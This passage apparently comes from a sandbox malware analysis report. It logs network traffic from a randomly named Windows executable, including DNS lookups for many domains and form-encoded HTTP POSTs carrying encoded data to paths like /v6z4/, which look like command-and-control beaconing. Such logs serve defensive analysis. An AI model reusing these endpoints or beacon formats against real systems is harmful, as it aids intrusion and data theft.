                                              Jul 8, 2024 09:36:56.219621897 CEST8049785103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:56.219664097 CEST8049785103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:56.219674110 CEST8049785103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:56.219685078 CEST8049785103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:56.219741106 CEST8049785103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:56.219750881 CEST8049785103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:56.219938040 CEST8049785103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:56.220067978 CEST8049785103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:56.220120907 CEST8049785103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:56.709939003 CEST8049785103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:56.710658073 CEST8049785103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:56.718563080 CEST4978580192.168.2.4103.168.172.37
                                              Jul 8, 2024 09:36:57.717845917 CEST4978580192.168.2.4103.168.172.37
                                              Jul 8, 2024 09:36:58.738568068 CEST4978680192.168.2.4103.168.172.37
                                              Jul 8, 2024 09:36:58.744601011 CEST8049786103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:58.748591900 CEST4978680192.168.2.4103.168.172.37
                                              Jul 8, 2024 09:36:58.748591900 CEST4978680192.168.2.4103.168.172.37
                                              Jul 8, 2024 09:36:58.753415108 CEST8049786103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:59.205349922 CEST8049786103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:59.206052065 CEST8049786103.168.172.37192.168.2.4
                                              Jul 8, 2024 09:36:59.206255913 CEST4978680192.168.2.4103.168.172.37
                                              Jul 8, 2024 09:36:59.210547924 CEST4978680192.168.2.4103.168.172.37
                                              Jul 8, 2024 09:36:59.215289116 CEST8049786103.168.172.37192.168.2.4

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 8, 2024 09:33:28.793044090 CEST5464753192.168.2.41.1.1.1
                                              Jul 8, 2024 09:33:28.807867050 CEST53546471.1.1.1192.168.2.4
                                              Jul 8, 2024 09:33:44.346595049 CEST5294153192.168.2.41.1.1.1
                                              Jul 8, 2024 09:33:44.842729092 CEST53529411.1.1.1192.168.2.4
                                              Jul 8, 2024 09:33:57.955666065 CEST5779253192.168.2.41.1.1.1
                                              Jul 8, 2024 09:33:57.968626022 CEST53577921.1.1.1192.168.2.4
                                              Jul 8, 2024 09:34:18.049755096 CEST5179353192.168.2.41.1.1.1
                                              Jul 8, 2024 09:34:18.236051083 CEST53517931.1.1.1192.168.2.4
                                              Jul 8, 2024 09:34:31.503925085 CEST5443753192.168.2.41.1.1.1
                                              Jul 8, 2024 09:34:31.517043114 CEST53544371.1.1.1192.168.2.4
                                              Jul 8, 2024 09:34:44.626982927 CEST5192553192.168.2.41.1.1.1
                                              Jul 8, 2024 09:34:44.785440922 CEST53519251.1.1.1192.168.2.4
                                              Jul 8, 2024 09:35:13.284638882 CEST6174353192.168.2.41.1.1.1
                                              Jul 8, 2024 09:35:13.553808928 CEST53617431.1.1.1192.168.2.4
                                              Jul 8, 2024 09:35:26.756666899 CEST6468553192.168.2.41.1.1.1
                                              Jul 8, 2024 09:35:26.796458006 CEST53646851.1.1.1192.168.2.4
                                              Jul 8, 2024 09:35:39.909708977 CEST5354253192.168.2.41.1.1.1
                                              Jul 8, 2024 09:35:40.860340118 CEST53535421.1.1.1192.168.2.4
                                              Jul 8, 2024 09:35:54.409833908 CEST5714553192.168.2.41.1.1.1
                                              Jul 8, 2024 09:35:55.406713963 CEST5714553192.168.2.41.1.1.1
                                              Jul 8, 2024 09:35:55.523142099 CEST53571451.1.1.1192.168.2.4
                                              Jul 8, 2024 09:35:55.527589083 CEST53571451.1.1.1192.168.2.4
                                              Jul 8, 2024 09:36:29.521048069 CEST6195353192.168.2.41.1.1.1
                                              Jul 8, 2024 09:36:29.539968967 CEST53619531.1.1.1192.168.2.4
                                              Jul 8, 2024 09:36:42.850632906 CEST5908653192.168.2.41.1.1.1
                                              Jul 8, 2024 09:36:42.860693932 CEST53590861.1.1.1192.168.2.4
                                              Jul 8, 2024 09:36:50.924501896 CEST5301453192.168.2.41.1.1.1
                                              Jul 8, 2024 09:36:51.130835056 CEST53530141.1.1.1192.168.2.4
                                              Jul 8, 2024 09:37:04.646394968 CEST5324353192.168.2.41.1.1.1
                                              Jul 8, 2024 09:37:04.660160065 CEST53532431.1.1.1192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jul 8, 2024 09:33:28.793044090 CEST192.168.2.41.1.1.10x41b2Standard query (0)www.angrytee.comA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:33:44.346595049 CEST192.168.2.41.1.1.10xfe02Standard query (0)www.orthonow.liveA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:33:57.955666065 CEST192.168.2.41.1.1.10x12e0Standard query (0)www.boutiqueinaboxshop.comA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:34:18.049755096 CEST192.168.2.41.1.1.10x8c47Standard query (0)www.lmsforsme.comA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:34:31.503925085 CEST192.168.2.41.1.1.10x7978Standard query (0)www.fundraiserstuffies.comA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:34:44.626982927 CEST192.168.2.41.1.1.10x5ecdStandard query (0)www.soutsour.xyzA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:35:13.284638882 CEST192.168.2.41.1.1.10xb889Standard query (0)www.mysticriverpath.comA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:35:26.756666899 CEST192.168.2.41.1.1.10xf8a3Standard query (0)www.mscuration.comA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:35:39.909708977 CEST192.168.2.41.1.1.10xa58dStandard query (0)www.wb515.comA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:35:54.409833908 CEST192.168.2.41.1.1.10x8e25Standard query (0)www.hf7777hi.netA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:35:55.406713963 CEST192.168.2.41.1.1.10x8e25Standard query (0)www.hf7777hi.netA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:36:29.521048069 CEST192.168.2.41.1.1.10xcbb6Standard query (0)www.qrdinamicos.comA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:36:42.850632906 CEST192.168.2.41.1.1.10xe407Standard query (0)www.personal-stylist.clubA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:36:50.924501896 CEST192.168.2.41.1.1.10x1982Standard query (0)www.jleabres.comA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:37:04.646394968 CEST192.168.2.41.1.1.10x6a7cStandard query (0)www.pu6wac.buzzA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jul 8, 2024 09:33:28.807867050 CEST1.1.1.1192.168.2.40x41b2No error (0)www.angrytee.comangrytee.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 8, 2024 09:33:28.807867050 CEST1.1.1.1192.168.2.40x41b2No error (0)angrytee.com3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:33:28.807867050 CEST1.1.1.1192.168.2.40x41b2No error (0)angrytee.com15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:33:44.842729092 CEST1.1.1.1192.168.2.40xfe02No error (0)www.orthonow.live199.59.243.226A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:33:57.968626022 CEST1.1.1.1192.168.2.40x12e0No error (0)www.boutiqueinaboxshop.comboutiqueinaboxshop.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 8, 2024 09:33:57.968626022 CEST1.1.1.1192.168.2.40x12e0No error (0)boutiqueinaboxshop.com3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:33:57.968626022 CEST1.1.1.1192.168.2.40x12e0No error (0)boutiqueinaboxshop.com15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:34:18.236051083 CEST1.1.1.1192.168.2.40x8c47No error (0)www.lmsforsme.comlmsforsme.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 8, 2024 09:34:18.236051083 CEST1.1.1.1192.168.2.40x8c47No error (0)lmsforsme.com3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:34:18.236051083 CEST1.1.1.1192.168.2.40x8c47No error (0)lmsforsme.com15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:34:31.517043114 CEST1.1.1.1192.168.2.40x7978No error (0)www.fundraiserstuffies.comfundraiserstuffies.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 8, 2024 09:34:31.517043114 CEST1.1.1.1192.168.2.40x7978No error (0)fundraiserstuffies.com3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:34:31.517043114 CEST1.1.1.1192.168.2.40x7978No error (0)fundraiserstuffies.com15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:34:44.785440922 CEST1.1.1.1192.168.2.40x5ecdNo error (0)www.soutsour.xyz203.161.41.207A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:35:13.553808928 CEST1.1.1.1192.168.2.40xb889No error (0)www.mysticriverpath.commysticriverpath.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 8, 2024 09:35:13.553808928 CEST1.1.1.1192.168.2.40xb889No error (0)mysticriverpath.com216.194.173.237A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:35:26.796458006 CEST1.1.1.1192.168.2.40xf8a3No error (0)www.mscuration.commscuration.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 8, 2024 09:35:26.796458006 CEST1.1.1.1192.168.2.40xf8a3No error (0)mscuration.com3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:35:26.796458006 CEST1.1.1.1192.168.2.40xf8a3No error (0)mscuration.com15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:35:40.860340118 CEST1.1.1.1192.168.2.40xa58dNo error (0)www.wb515.comwb88.wb-88.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 8, 2024 09:35:40.860340118 CEST1.1.1.1192.168.2.40xa58dNo error (0)wb88.wb-88.com38.47.226.116A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:35:55.523142099 CEST1.1.1.1192.168.2.40x8e25No error (0)www.hf7777hi.net132.226.11.158A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:35:55.527589083 CEST1.1.1.1192.168.2.40x8e25No error (0)www.hf7777hi.net132.226.11.158A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:36:29.539968967 CEST1.1.1.1192.168.2.40xcbb6No error (0)www.qrdinamicos.com217.160.0.119A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:36:42.860693932 CEST1.1.1.1192.168.2.40xe407Name error (3)www.personal-stylist.clubnonenoneA (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:36:51.130835056 CEST1.1.1.1192.168.2.40x1982No error (0)www.jleabres.com103.168.172.37A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:36:51.130835056 CEST1.1.1.1192.168.2.40x1982No error (0)www.jleabres.com103.168.172.52A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:37:04.660160065 CEST1.1.1.1192.168.2.40x6a7cNo error (0)www.pu6wac.buzz188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 8, 2024 09:37:04.660160065 CEST1.1.1.1192.168.2.40x6a7cNo error (0)www.pu6wac.buzz188.114.97.3A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.angrytee.com
                                              • www.orthonow.live
                                              • www.boutiqueinaboxshop.com
                                              • www.lmsforsme.com
                                              • www.fundraiserstuffies.com
                                              • www.soutsour.xyz
                                              • www.mysticriverpath.com
                                              • www.mscuration.com
                                              • www.wb515.com
                                              • www.hf7777hi.net
                                              • www.qrdinamicos.com
                                              • www.jleabres.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.4497413.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:33:28.821901083 CEST451OUTGET /8vcs/?QdC=AFMh5N&gNl=S5368XARNWnsRPU79+engpq5FH91z/VvzYo3ppZunCrDl85kGpMYYQZ3LKQ1c9Pzm3jcz7UCsoRBkqoouNpmJgjgkplBk0Qbj7O+44Ma0M/QxRY+rJ4fr5w= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.angrytee.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:33:29.289864063 CEST390INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Mon, 08 Jul 2024 07:33:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 64 43 3d 41 46 4d 68 35 4e 26 67 4e 6c 3d 53 35 33 36 38 58 41 52 4e 57 6e 73 52 50 55 37 39 2b 65 6e 67 70 71 35 46 48 39 31 7a 2f 56 76 7a 59 6f 33 70 70 5a 75 6e 43 72 44 6c 38 35 6b 47 70 4d 59 59 51 5a 33 4c 4b 51 31 63 39 50 7a 6d 33 6a 63 7a 37 55 43 73 6f 52 42 6b 71 6f 6f 75 4e 70 6d 4a 67 6a 67 6b 70 6c 42 6b 30 51 62 6a 37 4f 2b 34 34 4d 61 30 4d 2f 51 78 52 59 2b 72 4a 34 66 72 35 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QdC=AFMh5N&gNl=S5368XARNWnsRPU79+engpq5FH91z/VvzYo3ppZunCrDl85kGpMYYQZ3LKQ1c9Pzm3jcz7UCsoRBkqoouNpmJgjgkplBk0Qbj7O+44Ma0M/QxRY+rJ4fr5w="}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449742199.59.243.226805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:33:44.853055954 CEST719OUTPOST /v6z4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.orthonow.live
                                              Origin: http://www.orthonow.live
                                              Referer: http://www.orthonow.live/v6z4/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 69 37 6d 46 77 69 4b 52 4d 48 42 4f 6c 54 38 49 77 36 58 46 54 49 4c 7a 50 38 36 4d 46 36 61 4b 76 73 76 4f 6a 2f 68 54 67 38 72 68 69 52 56 34 38 67 57 5a 32 4d 6e 6e 6c 30 45 73 76 57 50 61 69 72 5a 30 4c 75 70 47 75 36 48 31 38 57 56 58 74 6b 65 78 46 68 72 31 52 6d 63 42 4b 55 4e 64 5a 57 38 47 6e 79 42 62 43 53 4e 4a 74 58 58 4f 30 6a 39 61 55 47 7a 51 42 70 64 68 7a 49 50 53 6c 53 68 73 2f 39 30 73 46 78 49 6e 6e 51 32 4b 43 72 65 78 4c 47 37 42 75 4f 2f 51 31 2b 69 6c 76 33 33 69 4d 32 48 58 4d 71 64 50 6a 62 58 42 62 2b 51 78 47 59 2b 69 50 6c 6a 44 65 68 38 6c 51 67 3d 3d
                                              Data Ascii: gNl=i7mFwiKRMHBOlT8Iw6XFTILzP86MF6aKvsvOj/hTg8rhiRV48gWZ2Mnnl0EsvWPairZ0LupGu6H18WVXtkexFhr1RmcBKUNdZW8GnyBbCSNJtXXO0j9aUGzQBpdhzIPSlShs/90sFxInnQ2KCrexLG7BuO/Q1+ilv33iM2HXMqdPjbXBb+QxGY+iPljDeh8lQg==
                                              Jul 8, 2024 09:33:45.323097944 CEST1236INHTTP/1.1 200 OK
                                              date: Mon, 08 Jul 2024 07:33:44 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1118
                                              x-request-id: a1b5b676-e918-4b2e-b316-36eab24bb338
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UihT/PrO9RprL/3o0R1NpRYmtkPdF1qurjngCFFLzhjtzem9/Fvwb2rexnHMpuXf3fSsyJk7K/TE81ELr3GTIg==
                                              set-cookie: parking_session=a1b5b676-e918-4b2e-b316-36eab24bb338; expires=Mon, 08 Jul 2024 07:48:45 GMT; path=/
                                              connection: close
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 55 69 68 54 2f 50 72 4f 39 52 70 72 4c 2f 33 6f 30 52 31 4e 70 52 59 6d 74 6b 50 64 46 31 71 75 72 6a 6e 67 43 46 46 4c 7a 68 6a 74 7a 65 6d 39 2f 46 76 77 62 32 72 65 78 6e 48 4d 70 75 58 66 33 66 53 73 79 4a 6b 37 4b 2f 54 45 38 31 45 4c 72 33 47 54 49 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UihT/PrO9RprL/3o0R1NpRYmtkPdF1qurjngCFFLzhjtzem9/Fvwb2rexnHMpuXf3fSsyJk7K/TE81ELr3GTIg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 8, 2024 09:33:45.323472977 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTFiNWI2NzYtZTkxOC00YjJlLWIzMTYtMzZlYWIyNGJiMzM4IiwicGFnZV90aW1lIjoxNzIwNDI0MD


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449743199.59.243.226805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:33:47.384155035 CEST739OUTPOST /v6z4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.orthonow.live
                                              Origin: http://www.orthonow.live
                                              Referer: http://www.orthonow.live/v6z4/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 69 37 6d 46 77 69 4b 52 4d 48 42 4f 33 67 55 49 79 5a 76 46 56 6f 4c 77 41 63 36 4d 54 4b 61 57 76 73 6a 4f 6a 39 4d 55 6a 4b 62 68 6e 42 46 34 39 68 57 5a 31 4d 6e 6e 74 55 45 31 6c 32 50 52 69 72 46 38 4c 72 52 47 75 35 37 31 38 53 5a 58 34 48 32 2b 45 78 72 37 64 47 63 48 4f 55 4e 64 5a 57 38 47 6e 7a 78 39 43 57 68 4a 74 48 6e 4f 33 43 39 64 49 32 7a 58 47 70 64 68 33 49 50 57 6c 53 68 43 2f 2f 41 47 46 7a 77 6e 6e 56 4b 4b 43 36 65 79 43 47 36 4b 71 4f 2b 52 6b 75 4c 78 74 6b 43 79 4b 57 4c 4f 4d 71 70 7a 69 64 47 62 4b 50 78 6d 55 59 61 52 53 69 71 33 54 69 42 73 4c 6c 35 77 63 55 58 51 33 52 77 31 45 2f 2f 30 61 55 65 57 77 42 6b 3d
                                              Data Ascii: gNl=i7mFwiKRMHBO3gUIyZvFVoLwAc6MTKaWvsjOj9MUjKbhnBF49hWZ1MnntUE1l2PRirF8LrRGu5718SZX4H2+Exr7dGcHOUNdZW8Gnzx9CWhJtHnO3C9dI2zXGpdh3IPWlShC//AGFzwnnVKKC6eyCG6KqO+RkuLxtkCyKWLOMqpzidGbKPxmUYaRSiq3TiBsLl5wcUXQ3Rw1E//0aUeWwBk=
                                              Jul 8, 2024 09:33:47.856290102 CEST1236INHTTP/1.1 200 OK
                                              date: Mon, 08 Jul 2024 07:33:47 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1118
                                              x-request-id: 73fd2943-f3b8-4470-9d84-1eacb91a511b
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UihT/PrO9RprL/3o0R1NpRYmtkPdF1qurjngCFFLzhjtzem9/Fvwb2rexnHMpuXf3fSsyJk7K/TE81ELr3GTIg==
                                              set-cookie: parking_session=73fd2943-f3b8-4470-9d84-1eacb91a511b; expires=Mon, 08 Jul 2024 07:48:47 GMT; path=/
                                              connection: close
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 55 69 68 54 2f 50 72 4f 39 52 70 72 4c 2f 33 6f 30 52 31 4e 70 52 59 6d 74 6b 50 64 46 31 71 75 72 6a 6e 67 43 46 46 4c 7a 68 6a 74 7a 65 6d 39 2f 46 76 77 62 32 72 65 78 6e 48 4d 70 75 58 66 33 66 53 73 79 4a 6b 37 4b 2f 54 45 38 31 45 4c 72 33 47 54 49 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UihT/PrO9RprL/3o0R1NpRYmtkPdF1qurjngCFFLzhjtzem9/Fvwb2rexnHMpuXf3fSsyJk7K/TE81ELr3GTIg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 8, 2024 09:33:47.856857061 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzNmZDI5NDMtZjNiOC00NDcwLTlkODQtMWVhY2I5MWE1MTFiIiwicGFnZV90aW1lIjoxNzIwNDI0MD


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449744199.59.243.226805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:33:49.916208029 CEST10821OUTPOST /v6z4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.orthonow.live
                                              Origin: http://www.orthonow.live
                                              Referer: http://www.orthonow.live/v6z4/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
